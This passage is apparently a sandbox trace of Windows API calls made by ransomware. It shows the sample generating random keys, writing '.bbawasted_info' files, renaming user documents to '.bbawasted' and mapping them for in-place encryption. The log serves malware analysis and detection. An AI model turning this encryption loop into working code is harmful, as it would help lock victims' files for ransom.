CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.389] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.389] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.389] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\wXHSOw.mp3") returned 75 [0070.389] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a0) returned 0x5c77b0 [0070.389] lstrcpyW (in: lpString1=0x5c7846, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.389] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.389] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.401] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.401] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\wXHSOw.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\wxhsow.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.402] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.403] SetEndOfFile (hFile=0x120) returned 1 [0070.403] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.403] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.403] lstrcpyW (in: lpString1=0x5c7846, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\wXHSOw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\wxhsow.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\wXHSOw.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\wxhsow.mp3.bbawasted")) returned 1 [0070.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_1PwpG\\yusR_ZDYxpM7ORa\\wXHSOw.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_1pwpg\\yusr_zdyxpm7ora\\wxhsow.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.404] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.404] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.405] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.405] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.405] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.406] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.406] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.414] SetEndOfFile (hFile=0x120) returned 1 [0070.416] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.416] CloseHandle (hObject=0x120) returned 1 [0070.418] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.418] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.419] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.419] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.419] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BPZWLkK WG.rtf") returned 57 [0070.419] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5c77b0 [0070.419] lstrcpyW (in: lpString1=0x5c7822, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.419] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.419] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.419] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.419] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BPZWLkK WG.rtf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bpzwlkk wg.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.420] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.421] SetEndOfFile (hFile=0x120) returned 1 [0070.421] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.421] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.421] lstrcpyW (in: lpString1=0x5c7822, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BPZWLkK WG.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bpzwlkk wg.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BPZWLkK WG.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bpzwlkk wg.rtf.bbawasted")) returned 1 [0070.422] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BPZWLkK WG.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_bpzwlkk wg.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0070.422] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.424] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.425] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.425] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.425] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.425] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.425] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.435] SetEndOfFile (hFile=0x120) returned 1 [0070.502] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.502] CloseHandle (hObject=0x120) returned 1 [0070.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.503] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.504] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.504] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.504] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\1MeV-wfDOC5.rtf") returned 79 [0070.504] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a8) returned 0x5c77b0 [0070.504] lstrcpyW (in: lpString1=0x5c784e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.504] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.504] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.505] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.505] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\1MeV-wfDOC5.rtf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\1mev-wfdoc5.rtf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.505] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.506] SetEndOfFile (hFile=0x120) returned 1 [0070.506] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.506] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.506] lstrcpyW (in: lpString1=0x5c784e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\1MeV-wfDOC5.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\1mev-wfdoc5.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\1MeV-wfDOC5.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\1mev-wfdoc5.rtf.bbawasted")) returned 1 [0070.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\1MeV-wfDOC5.rtf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\1mev-wfdoc5.rtf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.507] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.507] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.508] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.508] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.508] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.509] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.509] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.517] SetEndOfFile (hFile=0x120) returned 1 [0070.519] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.519] CloseHandle (hObject=0x120) returned 1 [0070.524] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.524] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.525] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.525] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.525] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\BCOlS9FvChUHF70Ag.xlsx") returned 86 [0070.525] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b6) returned 0x5c77b0 [0070.525] lstrcpyW (in: lpString1=0x5c785c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.525] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0070.525] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.526] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0070.526] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\BCOlS9FvChUHF70Ag.xlsx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\bcols9fvchuhf70ag.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0070.527] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.528] SetEndOfFile (hFile=0xf8) returned 1 [0070.528] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.528] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.528] lstrcpyW (in: lpString1=0x5c785c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.529] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\BCOlS9FvChUHF70Ag.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\bcols9fvchuhf70ag.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\BCOlS9FvChUHF70Ag.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\bcols9fvchuhf70ag.xlsx.bbawasted")) returned 1 [0070.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\BCOlS9FvChUHF70Ag.xlsx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\bcols9fvchuhf70ag.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.532] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0070.535] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.535] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.535] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.535] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.536] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.536] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.544] SetEndOfFile (hFile=0xf8) returned 1 [0070.578] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0070.578] CloseHandle (hObject=0xf8) returned 1 [0070.580] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.580] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5c8560) returned 1 [0070.580] CryptGenRandom (in: hProv=0x5c8560, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.580] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.581] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\GcQaeIjRo_gySbikdhr.odp") returned 87 [0070.581] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b8) returned 0x5c77b0 [0070.581] lstrcpyW (in: lpString1=0x5c785e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.581] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.581] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5c8560) returned 1 [0070.581] CryptGenRandom (in: hProv=0x5c8560, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.581] CryptReleaseContext (hProv=0x5c8560, dwFlags=0x0) returned 1 [0070.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\GcQaeIjRo_gySbikdhr.odp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\gcqaeijro_gysbikdhr.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.593] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.594] SetEndOfFile (hFile=0x120) returned 1 [0070.594] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.594] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.594] lstrcpyW (in: lpString1=0x5c785e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\GcQaeIjRo_gySbikdhr.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\gcqaeijro_gysbikdhr.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\GcQaeIjRo_gySbikdhr.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\gcqaeijro_gysbikdhr.odp.bbawasted")) returned 1 [0070.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\GcQaeIjRo_gySbikdhr.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\gcqaeijro_gysbikdhr.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.595] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0070.597] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0070.597] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0070.597] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.597] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0070.598] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0070.598] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.606] SetEndOfFile (hFile=0x120) returned 1 [0070.608] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.608] CloseHandle (hObject=0x120) returned 1 [0070.610] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0070.610] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0070.611] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0070.611] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.611] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\239DQPphtG6.ods") returned 85 [0070.611] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5c77b0 [0070.611] lstrcpyW (in: lpString1=0x5c785a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0070.611] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0070.611] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0070.612] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0070.612] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0070.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3p8DX\\5ixNamHgIormo\\jq1os\\239DQPphtG6.ods.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3p8dx\\5ixnamhgiormo\\jq1os\\239dqpphtg6.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.612] WriteFile (in: hFile=0x120, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0070.613] SetEndOfFile (hFile=0x120) returned 1 [0070.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.615] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0070.616] lstrcpyW (in: lpString1=0x5c785a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0070.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 